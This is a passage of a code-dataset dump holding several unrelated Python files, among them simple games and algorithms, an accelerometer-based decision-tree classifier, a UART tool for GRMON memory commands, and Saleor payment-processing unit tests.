Wins!\\n\")\n iPlayer1Score += 1\n elif sPlayer2Input == \"rock\" and sPlayer1Input == \"scissors\":\n print(sPlayer2Name + \" Wins!\\n\")\n iPlayer2Score += 1\n elif sPlayer2Input == \"paper\" and sPlayer1Input == \"rock\":\n print(sPlayer2Name + \" Wins!\\n\")\n iPlayer2Score += 1\n elif sPlayer2Input == \"scissors\" and sPlayer1Input == \"paper\":\n print(sPlayer2Name + \" Wins!\\n\")\n iPlayer2Score += 1\n elif sPlayer1Input == sPlayer2Input: # If the answers were the same, it's a draw\n print(\"It's a draw!\\n\")\n else:\n print(\"One of those entries was invalid, please try again\") # If the input was different to what was expected, print this\n return iPlayer1Score, iPlayer2Score
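\n# A hedged aside (added; not in the original script): the chain of conditions above\n# can be collapsed with a 'beats' mapping, e.g.:\n#\n# beats = {\"rock\": \"scissors\", \"paper\": \"rock\", \"scissors\": \"paper\"}\n# if beats.get(sPlayer1Input) == sPlayer2Input:\n# iPlayer1Score += 1 # player 1 wins\n# elif beats.get(sPlayer2Input) == sPlayer1Input:\n# iPlayer2Score += 1 # player 2 wins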
\n\ndef RockPaperScissors(iNumberOfRounds, bAI): # Creates a function to run the Rock, Paper, Scissors game\n iPlayer1Score = 0\n iPlayer2Score = 0\n sPlayer1Name = input(\"Please input the name of player 1: \") # Gets the user to enter the names of the players\n sPlayer2Name = input(\"Please input the name of player 2 (or the AI): \")\n\n LineBreak()\n\n if iNumberOfRounds == \"Infinite\": # If the player wants to play infinitely, do this\n \n while True: # Loop infinitely\n print(\"Enter 'exit' if you want to stop playing\\n\")\n (sPlayer1Input, sPlayer2Input) = UserInput(bAI, sPlayer1Name, sPlayer2Name) # Calls the function for user inputs\n\n if sPlayer1Input == \"exit\" or sPlayer2Input == \"exit\": # If the user enters this, exit the infinite loop\n break\n \n else:\n (iPlayer1Score, iPlayer2Score) = RockPaperScissorsWinConditions(sPlayer1Input, sPlayer2Input, sPlayer1Name, sPlayer2Name, iPlayer1Score, iPlayer2Score)\n\n LineBreak()\n \n print(\"The scores are\\n\"+ sPlayer1Name + \": \" + str(iPlayer1Score) + \"\\n\" + sPlayer2Name + \": \" + str(iPlayer2Score))\n\n LineBreak()\n\n else: # If the number of rounds is not infinite, do this\n \n for i in range(iNumberOfRounds): # For iNumberOfRounds, do this\n \n (sPlayer1Input, sPlayer2Input) = UserInput(bAI, sPlayer1Name, sPlayer2Name) # Calls the function for user inputs\n \n (iPlayer1Score, iPlayer2Score) = RockPaperScissorsWinConditions(sPlayer1Input, sPlayer2Input, sPlayer1Name, sPlayer2Name, iPlayer1Score, iPlayer2Score) # Calls the function for the win conditions\n \n print(\"The scores are\\n\"+ sPlayer1Name + \": \" + str(iPlayer1Score) + \"\\n\" + sPlayer2Name + \": \" + str(iPlayer2Score)) # Prints the player scores\n\n return iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name # Returns the player scores and their names as a tuple\n\ndef Results(iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name): # Function for calculating the overall winner\n if iPlayer1Score > iPlayer2Score: # If player 1's score is higher, they win\n print(sPlayer1Name + \" is the overall winner!\")\n elif iPlayer1Score < iPlayer2Score: # If player 2's score is higher, they win\n print(sPlayer2Name + \" is the overall winner!\")\n elif iPlayer1Score == iPlayer2Score: # If both scores are equal, they tie\n print(\"It's a draw!\")\n \n \nprint(\"Welcome to my Rock, Paper, Scissors Game!\")\n\nsAIPlayer = input(\"\"\"Would you like to play against an AI, or with another player? Y/N\n--> \"\"\")\nif sAIPlayer.lower() == \"y\": # If the lower case of the input is equal to this, set bAI to true\n bAI = True\nelse:\n bAI = False # Any other answer defaults to a two-player game (the original 'elif == \"n\"' left bAI undefined for other inputs)\n\nbContinue = True # Creates a variable I will use to break the loop\n\nwhile bContinue:\n\n LineBreak() # Inserts a line break to make the program look a bit neater\n \n# Creates a menu of options for the user to choose from\n sUserInput = input(\"\"\"Please choose an option\n 1: A 1 round game\n 2: A best of 3 game\n 3: A best of 5 game\n 4: Please enter a custom number of rounds\n 5: Play an infinite number of rounds (until you say to stop)\n 6: Exit the program\n --> \"\"\")\n\n LineBreak()\n\n# The code below will run the if statements depending on which option the user chose\n if sUserInput == \"1\":\n\n (iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name) = RockPaperScissors(1, bAI)\n# Calls the function RockPaperScissors() with the number of rounds to run and whether the player is playing against an AI, then unpacks the returned tuple into 4 variables\n Results(iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name) \n# Calculate who won using the scores of the players\n\n elif sUserInput == \"2\":\n (iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name) = RockPaperScissors(3, bAI)\n Results(iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name)\n\n elif sUserInput == \"3\":\n (iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name) = RockPaperScissors(5, bAI)\n Results(iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name)\n\n elif sUserInput == \"4\":\n iNumberOfRounds = int(input(\"Please enter the number of rounds you wish to play: \"))\n# Asks the user to enter the number of rounds to be played, then converts that to a number\n (iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name) = RockPaperScissors(iNumberOfRounds, bAI)\n Results(iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name)\n\n elif sUserInput == \"5\":\n (iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name) = RockPaperScissors(\"Infinite\", bAI) # Set the number of rounds to \"Infinite\", which is used to tell this part to loop infinitely\n Results(iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name)\n \n elif sUserInput == \"6\":\n bContinue = False # If the user enters \"6\", set bContinue to False, which stops the program
\n\n \n \n","repo_name":"JoeHolmes97/Rock-Paper-Scissors","sub_path":"Rock Paper Scissors/Rock_Paper_Scissors.py","file_name":"Rock_Paper_Scissors.py","file_ext":"py","file_size_in_byte":7459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2140426133","text":"\"\"\"Code Fragment 5.10: Python code for performing insertion-sort on a list.\"\"\"\n\n\ndef insertion_sort(A):\n \"\"\"Sort list of comparable elements into nondecreasing order.\"\"\"\n if len(A) > 1:\n for k in range(1, len(A)): # From 1 to n-1.\n cur = A[k] # Current element to be inserted.\n j = k # Find correct index j for current.\n while j > 0 and A[j-1] > cur: # If element before current is greater...\n A[j] = A[j-1] # swap places.\n j -= 1\n A[j] = cur # Cur is now in the right place.\n","repo_name":"awwalm/DSAlgoPy","sub_path":"Goodrich/Chapter5/insertion_sort.py","file_name":"insertion_sort.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"9408214414","text":"import sys\n\ninput = sys.stdin.readline\n\nnum = out = int(input())\n\n\ncount = 0\n\nwhile True:\n ten = num//10\n one = num % 10\n total = ten + one\n count += 1\n num = int(str(num % 10)+str(total % 10))\n if(out == num):\n break\nprint(count)\n","repo_name":"sanghyeonchoi/Algorithm","sub_path":"baekjoon1110.py","file_name":"baekjoon1110.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21526018726","text":"from backend.repositories.base import filter_params_normalize\nimport pytest\n\n\n@pytest.mark.parametrize('filters,expected', [\n (\n {\n \"age\": 10\n },\n {\n 'age': 10\n }\n ),\n (\n {\n 'age__gt': 10\n },\n {\n \"age\": {\"$gt\": 10}\n }\n ),\n (\n {\n 'nbr_of_players__gt': 1,\n 'cost_per_player': 1,\n },\n {\n 'nbr_of_players': {\"$gt\": 1},\n \"cost_per_player\": 1\n }\n )\n])\ndef test_params_normalize_creates_operator_expressions(filters, expected):\n assert filter_params_normalize(filters) == expected\n","repo_name":"ndy40/bball-pickup-game-organiser","sub_path":"test/test_repository.py","file_name":"test_repository.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32198166109","text":"import algorithmen.nearest_neighbors as nn\nimport numpy as np\nfrom statistics import *\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom misc.sensor import Sensor\nfrom prak4.P9_data import P9Data\nfrom signals.statistics import Statistics\n\n\ndef unique_vals(rows, col):\n return set([row[col] for row in rows])\n\n\ndef is_numeric(value):\n return isinstance(value, int) or isinstance(value, float)\n\n\ngehen_data = pd.read_csv('../../data/17SoSe/2017_Gruppe6_Appelfeller-Krupa/gehen.csv')\n# Walking does not start immediately, so trim the beginning of the series
\ngehen_data = gehen_data[gehen_data.Timestamp >= (1492076265800 + 5000)]\n\nhuepfen_data = pd.read_csv('../../data/17SoSe/2017_Gruppe6_Appelfeller-Krupa/huepfen.csv')\nhuepfen_data = huepfen_data[huepfen_data.Timestamp >= (1492076761760 + 3000)]\n\nruhe_data = pd.read_csv('../../data/17SoSe/2017_Gruppe6_Appelfeller-Krupa/ruhe.csv')\n\n# We do not need that much data -> clean up the graphs\ngehen_data['Timestamp_normalized'] = Statistics.get_timestamps_normalized(gehen_data['Timestamp'])\ngehen_data = gehen_data[gehen_data.Timestamp_normalized < 12000]\nruhe_data['Timestamp_normalized'] = Statistics.get_timestamps_normalized(ruhe_data['Timestamp'])\nruhe_data = ruhe_data[ruhe_data.Timestamp_normalized < 12000]\n\nhuepfen_data['Timestamp_normalized'] = Statistics.get_timestamps_normalized(huepfen_data['Timestamp'])\nhuepfen_data = huepfen_data[huepfen_data.Timestamp_normalized < 12000]\n\nplt.figure(figsize=(20, 10))\nplt.scatter(ruhe_data['Timestamp_normalized'], ruhe_data['accelX (m/s^2)'], label='ruhe')\nplt.scatter(gehen_data['Timestamp_normalized'], gehen_data['accelX (m/s^2)'], label='gehen')\nplt.scatter(huepfen_data['Timestamp_normalized'], huepfen_data['accelX (m/s^2)'], label='huepfen')\n\ndata_array = []\nsensors = Sensor.get_sensors()\nfeatures = 1 + len(sensors)\n\nwindow_size = 500 # timestamps\nmoving_size = 200\nwindow_count = int(12000 / moving_size)\n\nfor i in range(window_count):\n start = i * moving_size\n end = i * moving_size + window_size\n gehen_range = gehen_data[(gehen_data.Timestamp_normalized >= start)\n & (gehen_data.Timestamp_normalized <= end)]\n ruhe_range = ruhe_data[(ruhe_data.Timestamp_normalized >= start) & (ruhe_data.Timestamp_normalized <= end)]\n huepfen_range = huepfen_data[\n (huepfen_data.Timestamp_normalized >= start) & (huepfen_data.Timestamp_normalized <= end)]\n gehen_range_stddev = Statistics.get_standard_deviation(gehen_range['accelX (m/s^2)'])\n ruhe_range_stddev = Statistics.get_standard_deviation(ruhe_range['accelX (m/s^2)'])\n huepfen_range_stddev = Statistics.get_standard_deviation(huepfen_range['accelX (m/s^2)'])\n ruhe_features = [ruhe_range_stddev]\n gehen_features = [gehen_range_stddev]\n huepfen_features = [huepfen_range_stddev]\n if features > 1:\n for sensor in sensors:\n ruhe_sensor = ruhe_range[ruhe_range['ID'] == sensor.id]\n gehen_sensor = gehen_range[gehen_range['ID'] == sensor.id]\n huepfen_sensor = huepfen_range[huepfen_range['ID'] == sensor.id]\n gehen_features.append(Statistics.get_standard_deviation(gehen_sensor['accelX (m/s^2)']))\n ruhe_features.append(Statistics.get_standard_deviation(ruhe_sensor['accelX (m/s^2)']))\n huepfen_features.append(Statistics.get_standard_deviation(huepfen_sensor['accelX (m/s^2)']))\n data_array.append(P9Data(i, start, end, ruhe_features, gehen_features, huepfen_features))\n\n# Visualization\nheader = [\"stdabw\", \"label\"]\n\n\nclass Question:\n\n def __init__(self, column, value):\n self.column = column\n self.value = value\n\n def match(self, example):\n # Compare the feature value in an example to the\n # feature value in this question.\n val = example[self.column]\n if is_numeric(val):\n return val >= self.value\n else:\n return val == self.value\n\n def __repr__(self):\n # Visualization\n condition = \"==\"\n if is_numeric(self.value):\n condition = \">=\"\n return \"Is %s %s %s?\" % (\n header[self.column], condition, str(self.value))
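\n\n# A hedged illustration (added; not in the original file): a Question pairs a column\n# index with a threshold, so with header = [\"stdabw\", \"label\"]:\n#\n# q = Question(0, 0.5) # repr: \"Is stdabw >= 0.5?\"\n# q.match([0.8, 'gehen']) # -> True, since 0.8 >= 0.5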
\n\ndef partition(rows, question):\n true_rows, false_rows = [], []\n for row in rows:\n if question.match(row):\n true_rows.append(row)\n else:\n false_rows.append(row)\n return true_rows, false_rows\n\n\ndef class_counts(rows):\n # Added to make gini() and Leaf() runnable: count how often each label\n # (the last column of a row) occurs.\n counts = {}\n for row in rows:\n label = row[-1]\n counts[label] = counts.get(label, 0) + 1\n return counts\n\n\ndef gini(rows):\n counts = class_counts(rows) # label -> count (the original assigned the int 2 and then iterated over it)\n impurity = 1\n for lbl in counts:\n prob_of_lbl = counts[lbl] / float(len(rows))\n impurity -= prob_of_lbl ** 2\n return impurity\n\n\ndef info_gain(left, right, current_uncertainty):\n p = float(len(left)) / (len(left) + len(right))\n return current_uncertainty - p * gini(left) - (1 - p) * gini(right)\n\n\ndef find_best_split(rows):\n best_gain = 0 # keep track of the best information gain\n best_question = None # keep track of the feature / value that produced it\n current_uncertainty = gini(rows)\n n_features = len(rows[0]) - 1 # number of columns\n\n for col in range(n_features): # for each feature\n\n values = set([row[col] for row in rows]) # unique values in the column\n\n for val in values: # for each value\n\n question = Question(col, val)\n\n # try splitting the dataset\n true_rows, false_rows = partition(rows, question)\n\n # Skip this split if it doesn't divide the\n # dataset.\n if len(true_rows) == 0 or len(false_rows) == 0:\n continue\n\n # Calculate the information gain from this split\n gain = info_gain(true_rows, false_rows, current_uncertainty)\n\n if gain > best_gain:\n best_gain, best_question = gain, question\n\n return best_gain, best_question\n\n\nclass Leaf:\n def __init__(self, rows):\n self.predictions = class_counts(rows) # the original stored the constant 2, but build_tree calls Leaf(rows) and print_leaf expects a dict of counts\n\n\nclass Decision_Node:\n\n def __init__(self,\n question,\n true_branch,\n false_branch):\n self.question = question\n self.true_branch = true_branch\n self.false_branch = false_branch\n\n\ndef build_tree(rows):\n\n # Try partitioning the dataset on each of the unique attributes,\n # calculate the information gain,\n # and return the question that produces the highest gain.\n gain, question = find_best_split(rows)\n\n # Base case: no further info gain\n # Since we can ask no further questions,\n # we'll return a leaf.\n if gain == 0:\n return Leaf(rows)\n\n # If we reach here, we have found a useful feature / value\n # to partition on.\n true_rows, false_rows = partition(rows, question)\n\n # Recursively build the true branch.\n true_branch = build_tree(true_rows)\n\n # Recursively build the false branch.\n false_branch = build_tree(false_rows)\n\n # Return a Question node.\n # This records the best feature / value to ask at this point,\n # as well as the branches to follow\n # depending on the answer.\n return Decision_Node(question, true_branch, false_branch)\n\n\ndef print_tree(node, spacing=\"\"):\n\n # Base case: we've reached a leaf\n if isinstance(node, Leaf):\n print(spacing + \"Predict\", node.predictions)\n return\n\n # Print the question at this node\n print(spacing + str(node.question))\n\n # Call this function recursively on the true branch\n print(spacing + '--> True:')\n print_tree(node.true_branch, spacing + \" \")\n\n # Call this function recursively on the false branch\n print(spacing + '--> False:')\n print_tree(node.false_branch, spacing + \" \")\n\n\ndef classify(row, node):\n \"\"\"See the 'rules of recursion' above.\"\"\"\n\n # Base case: we've reached a leaf\n if isinstance(node, Leaf):\n return node.predictions\n\n # Decide whether to follow the true-branch or the false-branch.\n # Compare the feature / value stored in the node,\n # to the example we're considering.\n if node.question.match(row):\n return classify(row, node.true_branch)\n else:\n return classify(row, node.false_branch)
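\n\n# A worked check (added for clarity): for rows labelled ['a', 'a', 'b', 'b'],\n# class_counts(rows) gives {'a': 2, 'b': 2} and gini(rows) returns\n# 1 - (0.5**2 + 0.5**2) = 0.5, the maximum impurity for two equally likely classes.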
\n\ndef print_leaf(counts):\n total = sum(counts.values()) * 1.0\n probs = {}\n for lbl in counts.keys():\n probs[lbl] = str(int(counts[lbl] / total * 100)) + \"%\"\n return probs\n\n\nif __name__ == '__main__':\n\n teach_ratio = 0.4\n teach_train_limit = int(np.round(teach_ratio * len(data_array)))\n\n # Train (reconstructed from the commented-out draft in the original so the script\n # runs; assumes P9Data exposes the ruhe/gehen/huepfen feature lists it was built with)\n training_rows = []\n for x in range(0, teach_train_limit):\n data = data_array[x]\n training_rows.append(data.ruhe_features + ['ruhe'])\n training_rows.append(data.gehen_features + ['gehen'])\n training_rows.append(data.huepfen_features + ['huepfen'])\n my_tree = build_tree(training_rows)\n print_tree(my_tree)\n\n # Test\n for x in range(teach_train_limit, len(data_array)):\n data = data_array[x]\n for row in (data.ruhe_features + ['ruhe'],\n data.gehen_features + ['gehen'],\n data.huepfen_features + ['huepfen']):\n print(\"Actual: %s. Predicted: %s\" %\n (row[-1], print_leaf(classify(row, my_tree))))\n","repo_name":"pipeherra/MachineLearning","sub_path":"src/prak4/P9.py","file_name":"P9.py","file_ext":"py","file_size_in_byte":8791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17716803876","text":"\n# write a program to find the reverse of a given integer number\n\nno=int(input(\"Enter the number\"))\ndef rev_no(num):\n rev=0\n while num!=0:\n rev=rev*10+num%10\n num=num//10\n return rev\n\n\nprint(\"The reverse of the given number\",rev_no(no))\n\n\nprint(\"Welcome, the changes are made in the developer branch\")\n\ndef hello_msg():\n print(\"Welcome to hello function programming.....\")\n\nhello_msg()\n\n\nprint(\"the changes in gui with the updated one\")","repo_name":"ergokulpatil/int_code","sub_path":"c1.py","file_name":"c1.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40660903419","text":"import sys\nimport os\nimport argparse\nimport serial\nfrom binascii import unhexlify\nimport struct\nimport time\n\n\ndef uart_send(data):\n\tb = ser.write(data)\n\n\ndef send_write_cmd (cmd, addr, data):\n\t#Compose the command\n\tcmd_bytes = cmd+addr+data\t\n\tuart_send(cmd_bytes)\n\ndef send_read_cmd (cmd, addr):\n\t#Compose the command\n\tcmd_bytes = cmd+addr\t\n\tprint (cmd_bytes)\n\tuart_send(cmd_bytes)\n\ts = ser.read(4)\n\tprint(\"SIST port status\", s)\n\n\n# Adapt the input to convert from hex.\n# The number of digits should be even.\n# Remove 0x from the strings.\n# Remove spaces.\ndef parse_hex(hex_str):\n\ttry:\n\t\traw_hex = hex_str[2:] if hex_str.startswith(\"0x\") else hex_str # strip the 0x prefix; the original's lstrip(\"0x\") strips characters, not a prefix\n\t\thex_bytearray = bytearray.fromhex(raw_hex)\n\t\treturn (hex_bytearray)\n\n\texcept ValueError as e:\n\t\tprint (\"Error converting : {}\\n\".format(hex_str))\t\n\ndef parse_cmd(cnt, cmd_file):\n\tif cmd_file.startswith('#') : return\n\n\tif cmd_file.startswith('wmem') :\n\t\tcmd, addr, val = cmd_file.rstrip(\"\\n\").split()\n\t\t#Let's build a byte array from addr and val.\t\t\n\t\tprint(\" {} \\t|\\t {} {} {}\".format(cnt, cmd, addr, val))\n\n\t\tcmd_data = b'\\xC0'\n\t\taddr_data = parse_hex(addr)\n\t\tval_data = parse_hex(val)\n\n\t\t# Debug\n\t\t#print (addr_data)\n\t\t#print (val_data)\n\n\t\tsend_write_cmd (cmd_data, addr_data, val_data)\n\t\t\n\n\tif cmd_file.startswith('mem') :\t\n\t\tcmd, addr = cmd_file.split()\n\t\tprint(\" {} \\t|\\t {} {}\".format(cnt, cmd, addr))\n\t\tcmd_data = b'\\x80'\n\t\taddr_data = parse_hex(addr)\n\t\tsend_read_cmd (cmd_data, addr_data)\n\t\t# Debug\n\t\t#print (addr_data)\t\t
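\n# A hedged illustration (added; not in the original script): the two GRMON batch\n# commands parse_cmd understands, and the bytes they emit over the UART:\n#\n# wmem 0x40000000 0x12345678 -> b'\\xC0' + 4 address bytes + 4 value bytes\n# mem 0x40000000 -> b'\\x80' + 4 address bytes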
args[\"interface\"])\nprint(\"Script: \", args[\"script\"])\n\n\ntty_port = args[\"interface\"]\ntcl_script = args[\"script\"]\n\ntry:\n\tser = serial.Serial( port=tty_port,\n                     baudrate=115200,\n                     parity=serial.PARITY_NONE,\n                     stopbits=serial.STOPBITS_ONE,\n                     bytesize=serial.EIGHTBITS\n)\nexcept serial.SerialException as e:\n\tprint (\"Port {} is an unavailable serial device\".format(tty_port))\n\tsys.exit()\n\n\nser.isOpen()\nsync_data = b'\\x55\\x55'\nprint (sync_data)\t\nser.write(sync_data)\nprint (\"Port is opened.\")\n\ntime.sleep(0.100)\n\nwith open(tcl_script) as cmd_file:\n\tfor cnt, line in enumerate(cmd_file):\t\t\n\t\tparse_cmd(cnt, line)\n\t\ttime.sleep(0.010)\n\nser.close()\n","repo_name":"jmgomez-IAA/pyGRMON","sub_path":"src/interpret_grmon_batch.py","file_name":"interpret_grmon_batch.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"}
{"seq_id":"14874509619","text":"from decimal import Decimal\nfrom unittest.mock import Mock, patch\n\nimport pytest\n\nfrom django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.template.loader import get_template\nfrom prices import Money\nfrom saleor.order import OrderEvents, OrderEventsEmails\nfrom saleor.order.views import PAYMENT_TEMPLATE\nfrom saleor.payment import (\n    ChargeStatus, PaymentError, TransactionKind, get_payment_gateway)\nfrom saleor.payment.models import Payment\nfrom saleor.payment.utils import (\n    clean_authorize, clean_capture, create_payment, create_transaction,\n    gateway_authorize, gateway_capture, gateway_get_client_token,\n    gateway_refund, gateway_void, get_billing_data, handle_fully_paid_order,\n    validate_payment)\n\nNOT_ACTIVE_PAYMENT_ERROR = 'This payment is no longer active.'\nEXAMPLE_ERROR = 'Example dummy error'\n\n\n@pytest.fixture\ndef transaction_data(payment_dummy, settings):\n    return {\n        'payment': payment_dummy,\n        'token': 'token',\n        'kind': TransactionKind.CAPTURE,\n        'is_success': True,\n        'amount': Decimal('10.00'),\n        'currency': settings.DEFAULT_CURRENCY,\n        'gateway_response': {\n            'credit_card': '4321'}}\n\n\n@pytest.fixture\ndef gateway_params():\n    return {'secret-key': 'nobodylikesspanishinqusition'}\n\n\n@pytest.fixture\ndef transaction_token():\n    return 'transaction-token'\n\n\ndef test_get_billing_data(order):\n    assert order.billing_address\n    result = get_billing_data(order)\n    expected_result = {\n        'billing_first_name': order.billing_address.first_name,\n        'billing_last_name': order.billing_address.last_name,\n        'billing_company_name': order.billing_address.company_name,\n        'billing_address_1': order.billing_address.street_address_1,\n        'billing_address_2': order.billing_address.street_address_2,\n        'billing_city': order.billing_address.city,\n        'billing_postal_code': order.billing_address.postal_code,\n        'billing_country_code': order.billing_address.country.code,\n        'billing_email': order.user_email,\n        'billing_country_area': order.billing_address.country_area}\n    assert result == expected_result\n\n    order.billing_address = None\n    assert get_billing_data(order) == {}\n\n\ndef test_get_payment_gateway_not_allowed_checkout_choice(settings):\n    gateway = 'example-gateway'\n    settings.CHECKOUT_PAYMENT_GATEWAYS = {}\n    with pytest.raises(ValueError):\n        get_payment_gateway(gateway)\n\n\ndef test_get_payment_gateway_non_existing_name(settings):\n    gateway = 'example-gateway'\n    settings.CHECKOUT_PAYMENT_GATEWAYS = {gateway: 'Example gateway'}\n    with 
pytest.raises(ImproperlyConfigured):\n get_payment_gateway(gateway)\n\n\ndef test_get_payment_gateway(settings):\n gateway_name = list(settings.PAYMENT_GATEWAYS.keys())[0]\n gateway = settings.PAYMENT_GATEWAYS[gateway_name]\n gateway_module, gateway_params = get_payment_gateway(gateway_name)\n assert gateway_module.__name__ == gateway['module']\n assert gateway_params == gateway['connection_params']\n\n\n@patch('saleor.order.emails.send_payment_confirmation.delay')\ndef test_handle_fully_paid_order_no_email(\n mock_send_payment_confirmation, order):\n order.user = None\n order.user_email = ''\n\n handle_fully_paid_order(order)\n event = order.events.get()\n assert event.type == OrderEvents.ORDER_FULLY_PAID.value\n assert not mock_send_payment_confirmation.called\n\n\n@patch('saleor.order.emails.send_payment_confirmation.delay')\ndef test_handle_fully_paid_order(mock_send_payment_confirmation, order):\n handle_fully_paid_order(order)\n event_order_paid, event_email_sent = order.events.all()\n assert event_order_paid.type == OrderEvents.ORDER_FULLY_PAID.value\n\n assert event_email_sent.type == OrderEvents.EMAIL_SENT.value\n assert event_email_sent.parameters == {\n 'email': order.get_user_current_email(),\n 'email_type': OrderEventsEmails.PAYMENT.value}\n\n mock_send_payment_confirmation.assert_called_once_with(order.pk)\n\n\ndef test_validate_payment():\n @validate_payment\n def test_function(payment, *args, **kwargs):\n return True\n\n payment = Mock(is_active=True)\n test_function(payment)\n\n non_active_payment = Mock(is_active=False)\n with pytest.raises(PaymentError):\n test_function(non_active_payment)\n\n\ndef test_create_payment(settings):\n data = {'gateway': settings.DUMMY}\n payment = create_payment(**data)\n assert payment.gateway == settings.DUMMY\n\n same_payment = create_payment(**data)\n assert payment == same_payment\n\n\ndef test_create_transaction(transaction_data):\n txn = create_transaction(**transaction_data)\n\n assert txn.payment == transaction_data['payment']\n assert txn.token == transaction_data['token']\n assert txn.kind == transaction_data['kind']\n assert txn.is_success == transaction_data['is_success']\n assert txn.amount == transaction_data['amount']\n assert txn.gateway_response == transaction_data['gateway_response']\n\n same_txn = create_transaction(**transaction_data)\n assert txn == same_txn\n\n\ndef test_create_transaction_no_gateway_response(transaction_data):\n transaction_data.pop('gateway_response')\n txn = create_transaction(**transaction_data)\n assert txn.gateway_response == {}\n\n\ndef test_gateway_get_client_token(settings):\n gateway_name = list(settings.PAYMENT_GATEWAYS.keys())[0]\n gateway = settings.PAYMENT_GATEWAYS[gateway_name]\n module = gateway['module']\n with patch('%s.get_client_token' % module) as transaction_token_mock:\n gateway_get_client_token(gateway_name)\n assert transaction_token_mock.called\n\n\ndef test_gateway_get_client_token_not_allowed_gateway(settings):\n gateway = 'example-gateway'\n settings.CHECKOUT_PAYMENT_GATEWAYS = {}\n with pytest.raises(ValueError):\n gateway_get_client_token(gateway)\n\n\ndef test_gateway_get_client_token_not_existing_gateway(settings):\n gateway = 'example-gateway'\n settings.CHECKOUT_PAYMENT_GATEWAYS = {gateway: 'Example gateway'}\n with pytest.raises(ImproperlyConfigured):\n gateway_get_client_token(gateway)\n\n\n@pytest.mark.parametrize(\n 'func', [gateway_authorize, gateway_capture, gateway_refund, gateway_void])\ndef test_payment_needs_to_be_active_for_any_action(func, 
payment_dummy):\n payment_dummy.is_active = False\n with pytest.raises(PaymentError) as exc:\n func(payment_dummy, 'token')\n assert exc.value.message == NOT_ACTIVE_PAYMENT_ERROR\n\n\ndef test_gateway_authorize_errors(payment_dummy):\n payment_dummy.charge_status = ChargeStatus.CHARGED\n with pytest.raises(PaymentError) as exc:\n gateway_authorize(payment_dummy, 'payment-token')\n assert exc.value.message == (\n 'Charged transactions cannot be authorized again.')\n\n\n@patch('saleor.payment.utils.get_payment_gateway')\ndef test_gateway_authorize(\n mock_get_payment_gateway, payment_txn_preauth, gateway_params,\n transaction_token):\n payment_token = transaction_token\n txn = payment_txn_preauth.transactions.first()\n payment = payment_txn_preauth\n\n mock_authorize = Mock(return_value=(txn, ''))\n mock_get_payment_gateway.return_value = (\n Mock(authorize=mock_authorize), gateway_params)\n\n gateway_authorize(payment, payment_token)\n mock_get_payment_gateway.assert_called_once_with(payment.gateway)\n mock_authorize.assert_called_once_with(\n payment=payment, payment_token=payment_token, **gateway_params)\n\n\n@patch('saleor.payment.utils.get_payment_gateway')\ndef test_gateway_authorize_failed(\n mock_get_payment_gateway, payment_txn_preauth, gateway_params,\n transaction_token):\n payment_token = transaction_token\n txn = payment_txn_preauth.transactions.first()\n txn.is_success = False\n payment = payment_txn_preauth\n\n mock_authorize = Mock(return_value=(txn, EXAMPLE_ERROR))\n mock_get_payment_gateway.return_value = (\n Mock(authorize=mock_authorize), gateway_params)\n with pytest.raises(PaymentError) as exc:\n gateway_authorize(payment, payment_token)\n assert exc.value.message == EXAMPLE_ERROR\n\n\n@patch('saleor.payment.utils.handle_fully_paid_order')\n@patch('saleor.payment.utils.get_payment_gateway')\ndef test_gateway_capture(\n mock_get_payment_gateway, mock_handle_fully_paid_order, payment_txn_preauth,\n gateway_params):\n txn = payment_txn_preauth.transactions.first()\n payment = payment_txn_preauth\n assert not payment.captured_amount\n amount = payment.total\n\n mock_capture = Mock(return_value=(txn, ''))\n mock_get_payment_gateway.return_value = (\n Mock(capture=mock_capture), gateway_params)\n\n gateway_capture(payment, amount)\n mock_get_payment_gateway.assert_called_once_with(payment.gateway)\n mock_capture.assert_called_once_with(\n payment=payment, amount=amount, **gateway_params)\n\n payment.refresh_from_db()\n assert payment.charge_status == ChargeStatus.CHARGED\n assert payment.captured_amount == payment.total\n mock_handle_fully_paid_order.assert_called_once_with(payment.order)\n\n\n@patch('saleor.payment.utils.handle_fully_paid_order')\n@patch('saleor.payment.utils.get_payment_gateway')\ndef test_gateway_capture_partial_capture(\n mock_get_payment_gateway, mock_handle_fully_paid_order, payment_txn_preauth,\n gateway_params, settings):\n payment = payment_txn_preauth\n amount = payment.total * Decimal('0.5')\n txn = payment.transactions.first()\n txn.amount = amount\n txn.currency = settings.DEFAULT_CURRENCY\n\n mock_capture = Mock(return_value=(txn, ''))\n mock_get_payment_gateway.return_value = (\n Mock(capture=mock_capture), gateway_params)\n\n gateway_capture(payment, amount)\n\n payment.refresh_from_db()\n assert payment.charge_status == ChargeStatus.CHARGED\n assert payment.captured_amount == amount\n assert payment.currency == settings.DEFAULT_CURRENCY\n assert not 
